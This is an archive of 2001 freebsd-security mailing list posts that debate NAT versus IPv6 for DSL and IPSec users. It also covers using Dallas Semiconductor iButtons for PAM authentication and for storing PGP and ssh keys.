Date: Mon, 12 Mar 2001 23:02:03 -0800
Message-ID: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
In-Reply-To: <3AACF40D.4080504@Talarian.Com>
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
>-----Original Message-----
>From: owner-freebsd-questions@FreeBSD.ORG
>[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
>Sent: Monday, March 12, 2001 8:07 AM
>To: pW
>Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
>Subject: Re: Racoon Problem & Cisco Tunnel
>
>
>Yes. The five DSL setups with which I'm familiar all grant at least one
>public address per house. I believe all are static, but one might be
>dynamic. Interference with protocols like IPSec is one of the reasons
>why I'd make a public address a requirement when choising a DSL
>provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
>possible. Let's hasten the deployment of IPv6.
>
I'd agree with you if everyone that would have to do a renumber of a
large network from IPv4 to IPv6 had Vint Cerf's money. When your retired
like him with money coming out your arse-hole you can afford to make
irresponsible statements like that.
Unfortunately, what people like him don't understand is that the burden of
renumbering the fabric of the Internet from IPv4 to IPv6 will fall largely
on people like me - who have thousands of customers and tens of thousands of
public IP numbers spread out among all of them - and who don't have the
money to support something this audacious. I can almost guarentee that
whatever ISP that I am working for when this finally happens is going to go
out of business, all it's going to do is put thousands of smaller to
medium-sized ISP's into bankruptcy and let people like AOL who have money
coming out their arse-holes virtually monopolize Internet access in the
world.
Until I see the large organizations with Class A's tied up, give up those
numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6,
and most other ISP's that are out there are going to fight it as well. In
the meantime I'm pushing all my customers into using NAT. NAT is here to
stay and people that run around calling it an aberration are just proving to
the rest of us that they have absolutely no business sense.
NAT has proven itself reliable and vital and idiot engineers that design TCP
protocols that assume everyone has a public IP number are just architecting
their own failures, and their protocol's subsequent minimizing by the
market. I have some sympathy for protocols like IPSec that came to be
during the same time - but organizational-to-organizational IPSec tunnels
don't have to pass through the NAT - they can terminate on it. But, anyone
doing a new protocol today is a fool if it can't work though a NAT.
Ted Mittelstaedt tedm@toybox.placo.com
Author of: The FreeBSD Corporate Networker's Guide
Book website: http://www.freebsd-corp-net-guide.com
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 5:27: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.86.136])
by hub.freebsd.org (Postfix) with ESMTP id CE27437B725
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 05:26:59 -0800 (PST)
(envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163])
by phk.freebsd.dk (8.9.3/8.9.3) with ESMTP id OAA42540;
Tue, 13 Mar 2001 14:26:57 +0100 (CET)
(envelope-from phk@critter.freebsd.dk)
Received: from critter (localhost [127.0.0.1])
by critter.freebsd.dk (8.11.1/8.11.1) with ESMTP id f2DDREp06942;
Tue, 13 Mar 2001 14:27:15 +0100 (CET)
(envelope-from phk@critter.freebsd.dk)
To: Daniel Hagan <dhagan@colltech.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development
In-Reply-To: Your message of "Tue, 13 Mar 2001 00:36:19 EST."
<3AADB1D3.C70E00C@colltech.com>
Date: Tue, 13 Mar 2001 14:27:14 +0100
Message-ID: <6940.984490034@critter>
From: Poul-Henning Kamp <phk@critter.freebsd.dk>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
In message <3AADB1D3.C70E00C@colltech.com>, Daniel Hagan writes:
>There was some discussion regarding iButtons in mid-Jan on this list.
>I'm interested in getting one or more of these things to play with, with
>the goal of:
The best I can suggest you is that we rally all efforts
around:
http://anoncvs.aldigital.co.uk/iBLab/
--
Poul-Henning Kamp | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG | TCP/IP since RFC 956
FreeBSD committer | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 5:47:47 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.whitebarn.com (Spin.whitebarn.com [216.0.13.113])
by hub.freebsd.org (Postfix) with ESMTP
id E8C3237B72D; Tue, 13 Mar 2001 05:47:35 -0800 (PST)
(envelope-from Bob@Talarian.Com)
Received: from Talarian.Com (Relent.Bob.whitebarn.com [216.0.13.50])
by smtp.whitebarn.com (8.9.3/8.9.3) with ESMTP id HAA38781;
Tue, 13 Mar 2001 07:47:19 -0600 (CST)
(envelope-from Bob@Talarian.Com)
Message-ID: <3AAE24E6.9080802@Talarian.Com>
Date: Tue, 13 Mar 2001 07:47:18 -0600
From: Bob Van Valzah <Bob@Talarian.Com>
User-Agent: Mozilla/5.0 (X11; U; Linux 2.2.12 i386; en-US; 0.8) Gecko/20010215
X-Accept-Language: en
MIME-Version: 1.0
To: Ted Mittelstaedt <tedm@toybox.placo.com>
Cc: pW <packetwhore@stargate.net>, FreeBSD-Security@FreeBSD.ORG,
FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel
References: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>
Content-Type: multipart/alternative;
boundary="------------080107090808010207030409"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--------------080107090808010207030409
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Ted, Loved the book--can't wait for the movie!
This is a religious war that's been fought many times before. Since my
last answer was too flip, I'll clarify my point of view. IPv4, IPv6, and
NAT are all just tools that I have to apply with "business sense." NAT's
not inherently evil, nor is IPv6. Their sensibility will change over
time and depend upon the application.
If I were shopping for DSL for "my mom," I wouldn't care if she got a
public address or not. Reliability and good support (as a "little guy"
can more often provide) would be more important.
But when I'm shopping for DSL for a work-from-home, multicast protocol
stack developer, a public address is a requirement. In fact, it's
something I'll pay extra to get. For my business, IPSec is important and
hence having at least one public address is important.
My protocol developers have a few LANs at home and we happily use NAT
there. I wouldn't pay extra to get enough address space to put public
addresses on all their home lab machines.
An ISP who won't give me at least one public address is just limiting
where I can apply their service. An ISP who gives me one or more public
addresses let's me pick the point at which I want to apply NAT.
So in spite of my flip remarks, I hope you can see that I do use NAT--I
just put it off to the last minute where it doesn't make business sense
to avoid it.
Bob
Ted Mittelstaedt wrote:
>> -----Original Message-----
>> From: owner-freebsd-questions@FreeBSD.ORG
>> [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
>> Sent: Monday, March 12, 2001 8:07 AM
>> To: pW
>> Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
>> Subject: Re: Racoon Problem & Cisco Tunnel
>>
>>
>> Yes. The five DSL setups with which I'm familiar all grant at least one
>> public address per house. I believe all are static, but one might be
>> dynamic. Interference with protocols like IPSec is one of the reasons
>> why I'd make a public address a requirement when choising a DSL
>> provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
>> possible. Let's hasten the deployment of IPv6.
>>
>
> I'd agree with you if everyone that would have to do a renumber of a
> large network from IPv4 to IPv6 had Vint Cerf's money. When your retired
> like him with money coming out your arse-hole you can afford to make
> irresponsible statements like that.
>
> Unfortunately, what people like him don't understand is that the burden of
> renumbering the fabric of the Internet from IPv4 to IPv6 will fall largely
> on people like me - who have thousands of customers and tens of thousands of
> public IP numbers spread out among all of them - and who don't have the
> money to support something this audacious. I can almost guarentee that
> whatever ISP that I am working for when this finally happens is going to go
> out of business, all it's going to do is put thousands of smaller to
> medium-sized ISP's into bankruptcy and let people like AOL who have money
> coming out their arse-holes virtually monopolize Internet access in the
> world.
>
> Until I see the large organizations with Class A's tied up, give up those
> numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6,
> and most other ISP's that are out there are going to fight it as well. In
> the meantime I'm pushing all my customers into using NAT. NAT is here to
> stay and people that run around calling it an aberration are just proving to
> the rest of us that they have absolutely no business sense.
>
> NAT has proven itself reliable and vital and idiot engineers that design TCP
> protocols that assume everyone has a public IP number are just architecting
> their own failures, and their protocol's subsequent minimizing by the
> market. I have some sympathy for protocols like IPSec that came to be
> during the same time - but organizational-to-organizational IPSec tunnels
> don't have to pass through the NAT - they can terminate on it. But, anyone
> doing a new protocol today is a fool if it can't work though a NAT.
>
>
>
> Ted Mittelstaedt tedm@toybox.placo.com
> Author of: The FreeBSD Corporate Networker's Guide
> Book website: http://www.freebsd-corp-net-guide.com
>
>
>
--------------080107090808010207030409
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
<html><head></head><body>Ted, Loved the book--can't wait for the movie!<br>
<br>
This is a religious war that's been fought many times before. Since my last
answer was too flip, I'll clarify my point of view. IPv4, IPv6, and NAT are
all just tools that I have to apply with "business sense." NAT's not inherently
evil, nor is IPv6. Their sensibility will change over time and depend upon
the application.<br>
<br>
If I were shopping for DSL for "my mom," I wouldn't care if she got a public
address or not. Reliability and good support (as a "little guy" can more
often provide) would be more important.<br>
<br>
But when I'm shopping for DSL for a work-from-home, multicast protocol stack
developer, a public address is a requirement. In fact, it's something I'll
pay extra to get. For my business, IPSec is important and hence having at
least one public address is important.<br>
<br>
My protocol developers have a few LANs at home and we happily use NAT there.
I wouldn't pay extra to get enough address space to put public addresses
on all their home lab machines.<br>
<br>
An ISP who won't give me at least one public address is just limiting where
I can apply their service. An ISP who gives me one or more public addresses
let's me pick the point at which I want to apply NAT.<br>
<br>
So in spite of my flip remarks, I hope you can see that I do use NAT--I just
put it off to the last minute where it doesn't make business sense to avoid
it.<br>
<br>
Bob<br>
<br>
Ted Mittelstaedt wrote:<br>
<blockquote type="cite" cite="mid:000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com">
<blockquote type="cite"><pre wrap="">-----Original Message-----<br>From: <a class="moz-txt-link-abbreviated" href="mailto:owner-freebsd-questions@FreeBSD.ORG">owner-freebsd-questions@FreeBSD.ORG</a><br>[<a class="moz-txt-link-freetext" href="mailto:owner-freebsd-questions@FreeBSD.ORG">mailto:owner-freebsd-questions@FreeBSD.ORG</a>]On Behalf Of Bob Van Valzah<br>Sent: Monday, March 12, 2001 8:07 AM<br>To: pW<br>Cc: <a class="moz-txt-link-abbreviated" href="mailto:FreeBSD-Security@FreeBSD.ORG">FreeBSD-Security@FreeBSD.ORG</a>; <a class="moz-txt-link-abbreviated" href="mailto:FreeBSD-Questions@FreeBSD.ORG">FreeBSD-Questions@FreeBSD.ORG</a><br>Subject: Re: Racoon Problem & Cisco Tunnel<br><br><br>Yes. The five DSL setups with which I'm familiar all grant at least one<br>public address per house. I believe all are static, but one might be<br>dynamic. Interference with protocols like IPSec is one of the reasons<br>why I'd make a public address a requirement when choising a DSL!
<br>provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all<br>possible. Let's hasten the deployment of IPv6.<br><br></pre></blockquote>
<pre wrap=""><!----><br>I'd agree with you if everyone that would have to do a renumber of a<br>large network from IPv4 to IPv6 had Vint Cerf's money. When your retired<br>like him with money coming out your arse-hole you can afford to make<br>irresponsible statements like that.<br><br>Unfortunately, what people like him don't understand is that the burden of<br>renumbering the fabric of the Internet from IPv4 to IPv6 will fall largely<br>on people like me - who have thousands of customers and tens of thousands of<br>public IP numbers spread out among all of them - and who don't have the<br>money to support something this audacious. I can almost guarentee that<br>whatever ISP that I am working for when this finally happens is going to go<br>out of business, all it's going to do is put thousands of smaller to<br>medium-sized ISP's into bankruptcy and let people like AOL who have money<br>coming out their arse-holes virtually monopolize Internet access in the<br>world.<br>!
<br>Until I see the large organizations with Class A's tied up, give up those<br>numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6,<br>and most other ISP's that are out there are going to fight it as well. In<br>the meantime I'm pushing all my customers into using NAT. NAT is here to<br>stay and people that run around calling it an aberration are just proving to<br>the rest of us that they have absolutely no business sense.<br><br>NAT has proven itself reliable and vital and idiot engineers that design TCP<br>protocols that assume everyone has a public IP number are just architecting<br>their own failures, and their protocol's subsequent minimizing by the<br>market. I have some sympathy for protocols like IPSec that came to be<br>during the same time - but organizational-to-organizational IPSec tunnels<br>don't have to pass through the NAT - they can terminate on it. But, anyone<br>doing a new protocol today is a fool if it can't work though a NAT.!
<br><br><br><br>Ted Mittelstaedt <a class="moz-txt-link-abbreviated" href="mailto:tedm@toybox.placo.com">tedm@toybox.placo.com</a><br>Author of: The FreeBSD Corporate Networker's Guide<br>Book website: <a class="moz-txt-link-freetext" href="http://www.freebsd-corp-net-guide.com">http://www.freebsd-corp-net-guide.com</a><br><br><br><br></pre>
</blockquote>
<br>
</body></html>
--------------080107090808010207030409--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 6:51: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tiger.thinksec.com (tiger.thinksec.com [193.212.248.18])
by hub.freebsd.org (Postfix) with ESMTP id 3D19237B72C
for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 06:50:51 -0800 (PST)
(envelope-from terje@thinksec.no)
Received: by tiger.thinksec.com (Postfix, from userid 1001)
id 970C5106042; Tue, 13 Mar 2001 15:50:47 +0100 (CET)
Date: Tue, 13 Mar 2001 15:50:46 +0100
From: Terje Elde <terje@thinksec.no>
To: Daniel Hagan <dhagan@colltech.com>
Cc: freebsd-security@freebsd.org
Subject: Re: iButton Development
Message-ID: <20010313155046.E9762@thinksec.com>
References: <3AADB1D3.C70E00C@colltech.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="Oiv9uiLrevHtW1RS"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3AADB1D3.C70E00C@colltech.com>; from dhagan@colltech.com on Tue, Mar 13, 2001 at 12:36:19AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--Oiv9uiLrevHtW1RS
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Tue, Mar 13, 2001 at 12:36:19AM -0500, Daniel Hagan wrote:
> There was some discussion regarding iButtons in mid-Jan on this list.=20
> I'm interested in getting one or more of these things to play with, with
> the goal of:
For reasons I don't quite know I missed that thread... However I'm the
coordinator of the iButton project, which aims to define a set of API's to
communicate with iButtons, or the 1-wire bus in general, as well as making a
daemon to handle the actual communication with the 1-wire bus, as well as
multiplexing between users and applications where desired.
I must admit the project has been idle for a little while now, though I'm s=
ure a
cooperation could be mutually beneficial.
> o Authenticating myself to my home workstations (pam module?).
Our plans include making pam module which uses the API's(/sdk) for either
simple authentication using the serial number on the iButtons (yuck) or my
favorite, full public key authentication using the java iButtons.
> o Storing PGP & ssh keys.
Also a obvious extension. One idea we've been playing with is to not only
keep the keys on the button, but never to let them be anywhere else. The j=
ava
iButton for example, could handle the cryptographic functions for you. It
features cool things like rapid destroying of the content should you try to
tamper with it.
> Since I assume these are tasks of interest to more people than just
> myself, I was wondering:
>=20
> o Does anyone have existing code bases to support these tasks?
We've done very basic coding and design of the API's, though we don't have =
any
of the code working with the actual buttons up and running yet.
> o Is there any support (in the political sense) for getting the pam
> module and/or other code incorporated into the base system or as a port?
Strong cryptographic authentication system and secure storage with possible
extension of cheap industrial chips with everything from temp sensors to AD=
/DA
converters and whatnot. Who wouldn't want it?
> o Does anyone have any recommendations on what hardware to procure for
> these tasks? I was looking at getting a serial port BlueDot (possibly
> two or three, I have some laptops I may want to use this with too) and a
> DS1996L-F5 64-kbit Memory iButton. I would also think about getting a
> Java-powered iButton, Model 96, Release 1.1 (or 2.2) if I understood
> exactly what I'd be getting for the money. Does anyone have any
> information/examples on how these Java iButtons are used?
You probably want the following (in the order they're listed in the dalsemi
shop online):
* DS1921L-F52 - Thermochron (-20=B0C to +85=B0C)
It'll allow you to play more with the bus, making sure the knowledge
sticks. Not really required for these tasks, but it's so cute.
* DS19550-401 - Java-powered iButton, Model 96, Release 1.1
* DS1957B-406 - Java-powered iButton, Model 96, Release 1.1
=20
You want both, because if you're going to do development on these, you'll
probably want to make sure your software will work properly on both.
As for what you'll get...
=20
* JVM
These babies actually run Java code, as long as they're docked and have
power. As soon as you rip out the power, the applications are still i=
n a
running state, but they're execution speed is frozen so to speak.
=20
* PRNG
Perfect to both feed your Java code, and perhaps also relay to a FreeB=
SD
box to help feed it's PRNG.
* Crypto
* SHA-1
* RSA
* DES
* 3DES
The math accelerator for RSA operations handles them with a less than 1
sec worst-case.
At least the 2.2 release has 134kbytes of RAM, which makes it the iBut=
ton
with the biggest storage.
* DS1963S-F5 - SHA-1 iButton
You'll want this so you can do keyed hashes for authentication. It's mu=
ch
better than the java iButtons for this task, due to it's lower price.
In addition to those you'll want some of the other memory iButtons, a nice
selection to fit your taste. I recommend you get at least two or so of the
bigger ones, and as many as you feel like of the cheaper.
For connectivity I would like to suggest that you get one or several serial
adaptors, with matching bluedots. Let me remind you that there are
differences between them, but which you'd want is perhaps a matter of taste.
Getting some of each might not be a bad idea. I would recommend you stick
with serial, as they're supposedly easier to use, and has some software
already available (hint: ports/comms/mlan, though it's not up to date (hint=
)).
You might also want to look at the TINI, as it's got a 1-wire device, and
would be pretty nice to integrate with everything.
Terje "delta" Elde
ThinkSec AS
--Oiv9uiLrevHtW1RS
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6rjPGtO3jfBe8qO0RAjK3AJ9t+VS+teR9jzyqkq5Vn0V9B1x2RQCfXbG4
rdCFa/r/9xjfdth83VbHeKo=
=mDuZ
-----END PGP SIGNATURE-----
--Oiv9uiLrevHtW1RS--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 6:59:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.86.136])
by hub.freebsd.org (Postfix) with ESMTP id 9E15D37B71F
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 06:59:12 -0800 (PST)
(envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163])
by phk.freebsd.dk (8.9.3/8.9.3) with ESMTP id PAA43884;
Tue, 13 Mar 2001 15:59:11 +0100 (CET)
(envelope-from phk@critter.freebsd.dk)
Received: from critter (localhost [127.0.0.1])
by critter.freebsd.dk (8.11.1/8.11.1) with ESMTP id f2DExTp07859;
Tue, 13 Mar 2001 15:59:29 +0100 (CET)
(envelope-from phk@critter.freebsd.dk)
To: Terje Elde <terje@thinksec.no>
Cc: Daniel Hagan <dhagan@colltech.com>, freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development
In-Reply-To: Your message of "Tue, 13 Mar 2001 15:50:46 +0100."
<20010313155046.E9762@thinksec.com>
Date: Tue, 13 Mar 2001 15:59:29 +0100
Message-ID: <7857.984495569@critter>
From: Poul-Henning Kamp <phk@critter.freebsd.dk>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
My share in this is mostly the monitoring gadgets with the 1wire
products, but given working software I would probably put my pgp
key somewhere more safe as well.
--
Poul-Henning Kamp | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG | TCP/IP since RFC 956
FreeBSD committer | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 7: 5:47 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tiger.thinksec.com (tiger.thinksec.com [193.212.248.18])
by hub.freebsd.org (Postfix) with ESMTP id 0732B37B724
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 07:05:42 -0800 (PST)
(envelope-from terje@thinksec.no)
Received: by tiger.thinksec.com (Postfix, from userid 1001)
id 22EC4106042; Tue, 13 Mar 2001 16:05:40 +0100 (CET)
Date: Tue, 13 Mar 2001 16:05:40 +0100
From: Terje Elde <terje@thinksec.no>
To: Poul-Henning Kamp <phk@critter.freebsd.dk>
Cc: Daniel Hagan <dhagan@colltech.com>, freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development
Message-ID: <20010313160540.F9762@thinksec.com>
References: <20010313155046.E9762@thinksec.com> <7857.984495569@critter>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="R6sEYoIZpp9JErk7"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <7857.984495569@critter>; from phk@critter.freebsd.dk on Tue, Mar 13, 2001 at 03:59:29PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--R6sEYoIZpp9JErk7
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
On Tue, Mar 13, 2001 at 03:59:29PM +0100, Poul-Henning Kamp wrote:
> My share in this is mostly the monitoring gadgets with the 1wire
> products, but given working software I would probably put my pgp
> key somewhere more safe as well.
I do see your concern, and I would not automatically trust the iButtons 100%,
but it's a good hardware building block to base things on. If you store a
encrypted version of your pgp/ssh keys on it, then you would really need to
break the algorithm to gain access to the keys, in which case you can attack
pgp in itself anyways. (simplified; if you break the symmetric cipher which
has encrypted the keys stored on the iButton then you've got the keys, while
if you had broken the same symmetric cipher in pgp itself, the keys would be
safe as soon as you switch to another algorithm, and you would have to perform
one such crack for each message).
Or rather, in the end how things are set up and used is really up to the end
user. My goal is to try to help provide the tools to make the technology
available, and also the guidance to balance the risks. What makes a good
choice is highly dependent on a lot of factors, and what's right for you isn't
always right for everyone else. If my access was limited to a single shared
win95 box, then I'd feel much more comfortable with a iButton performing the
crypto for me, and keeping the keys, than storing them on the windows box.
Terje "delta" Elde
ThinkSec AS
--R6sEYoIZpp9JErk7
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6rjdEtO3jfBe8qO0RAj1YAJ4p73caXUlQoCxQi9SkogN6tocCgQCfUWfW
FfwG5z59uawYKJYAICvebyw=
=QnMf
-----END PGP SIGNATURE-----
--R6sEYoIZpp9JErk7--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 7:18:58 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tiger.thinksec.com (tiger.thinksec.com [193.212.248.18])
by hub.freebsd.org (Postfix) with ESMTP id 822DF37B72B
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 07:18:54 -0800 (PST)
(envelope-from terje@thinksec.no)
Received: by tiger.thinksec.com (Postfix, from userid 1001)
id AEE51106042; Tue, 13 Mar 2001 16:18:52 +0100 (CET)
Date: Tue, 13 Mar 2001 16:18:52 +0100
From: Terje Elde <terje@thinksec.no>
To: Borja Marcos <borjamar@sarenet.es>
Cc: Poul-Henning Kamp <phk@critter.freebsd.dk>,
freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development
Message-ID: <20010313161852.G9762@thinksec.com>
References: <3AADB1D3.C70E00C@colltech.com> <20010313155046.E9762@thinksec.com> <3AAE3809.F795A6A5@sarenet.es>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="RDS4xtyBfx+7DiaI"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3AAE3809.F795A6A5@sarenet.es>; from borjamar@sarenet.es on Tue, Mar 13, 2001 at 04:08:57PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--RDS4xtyBfx+7DiaI
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Tue, Mar 13, 2001 at 04:08:57PM +0100, Borja Marcos wrote:
> > Also a obvious extension. One idea we've been playing with is to not o=
nly
> > keep the keys on the button, but never to let them be anywhere else. T=
he java
> > iButton for example, could handle the cryptographic functions for you. =
It
> > features cool things like rapid destroying of the content should you tr=
y to
> > tamper with it.
>=20
> This would be the ideal system; when used for ssh, for example,
> the button stores the private part of the RSA key, and the challenge is=
=20
> sent by the ssh-agent to the button. It encrypts the challenge and
> returns the answer.
>=20
> If the key is kept inside the button, it can be useful even
> in hostile environments. I understand that now there are buttons
> capable of running small prograams.
As Poul-Henning points out, doing this isn't for everyone. It pretty much
boils down to what you trust the most. The security of your hardware/softw=
are
and your ability to set it up, or the iButtons.
In the case of my private workstation, I'd normally prefer running the cryp=
to
on the workstation itself, not allowing the iButtons to be as much of a weak
link. Should I ever have the need for ssh'ing from public company terminals
to note quite secure systems on the other hand, this would be a good idea.
A toolkit to pick what one likes from, not enforcing the way I want it one
everyone else.
Terje
--RDS4xtyBfx+7DiaI
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6rjpctO3jfBe8qO0RAgihAJ9L0CUVce5vJBxeLqnEXE4P1zszpACff1kF
x90lqiz16wedeCk/ZVdc0aM=
=Hywq
-----END PGP SIGNATURE-----
--RDS4xtyBfx+7DiaI--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 7:40:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2])
by hub.freebsd.org (Postfix) with ESMTP
id 84A3937B71B; Tue, 13 Mar 2001 07:40:49 -0800 (PST)
(envelope-from jwyatt@rwsystems.net)
Received: from bsdie.rwsystems.net([209.197.223.2]) (4509 bytes) by bsdie.rwsystems.net
via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp
(sender: <jwyatt@rwsystems.net>)
id <m14cqrW-000CCQC@bsdie.rwsystems.net>
for <FreeBSD-Questions@FreeBSD.ORG>; Tue, 13 Mar 2001 09:37:26 -0600 (CST)
(Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25)
Date: Tue, 13 Mar 2001 09:37:23 -0600 (CST)
From: James Wyatt <jwyatt@rwsystems.net>
To: Ted Mittelstaedt <tedm@toybox.placo.com>
Cc: Bob Van Valzah <Bob@Talarian.Com>, pW <packetwhore@stargate.net>,
FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG
Subject: RE: Racoon Problem & Cisco Tunnel
In-Reply-To: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>
Message-ID: <Pine.BSF.4.10.10103130847370.72725-100000@bsdie.rwsystems.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Mon, 12 Mar 2001, Ted Mittelstaedt wrote:
> >-----Original Message-----
> >From: owner-freebsd-questions@FreeBSD.ORG
> >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
> >Sent: Monday, March 12, 2001 8:07 AM
> >Subject: Re: Racoon Problem & Cisco Tunnel
> >
> >Yes. The five DSL setups with which I'm familiar all grant at least one
> >public address per house. I believe all are static, but one might be
> >dynamic. Interference with protocols like IPSec is one of the reasons
> >why I'd make a public address a requirement when choising a DSL
> >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
> >possible. Let's hasten the deployment of IPv6.
[ ... ]
> Until I see the large organizations with Class A's tied up, give up those
> numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6,
> and most other ISP's that are out there are going to fight it as well. In
> the meantime I'm pushing all my customers into using NAT. NAT is here to
> stay and people that run around calling it an aberration are just proving to
> the rest of us that they have absolutely no business sense.
NAT is a tool and you can hurt yourself with it or do useful things with
it, not an aberration or silver-bullet. Folks with fast hosts or small
amounts of traffic and simple needs love it - especially home broadband
users. There is a trade-off for many router users though: a) just change
the header when NAT-ting, or b) correct the packet checksums and lose your
ASIC efficiency and kill your shared-CPU. NAT can also make peer-to-peer
networking for groups of workstations across NAT barriers difficult if you
have to chew-up static IPs from what I can tell.
Many large corporations like GE Corp have huge RFC networks internally. If
you ever have to make an internal Frame Relay link between them behind
their public firewalls, you will learn new words for describing RFC
networking limitations. "Oh &$*^^%! Our router thinks their Chicago server
is on the same LAN segment as our Fort Worth server, but with a different
netmask. Which of us should renumber our servers? Can IPSec help this?"
> NAT has proven itself reliable and vital and idiot engineers that design TCP
> protocols that assume everyone has a public IP number are just architecting
> their own failures, and their protocol's subsequent minimizing by the
> market. I have some sympathy for protocols like IPSec that came to be
> during the same time - but organizational-to-organizational IPSec tunnels
> don't have to pass through the NAT - they can terminate on it. But, anyone
> doing a new protocol today is a fool if it can't work though a NAT.
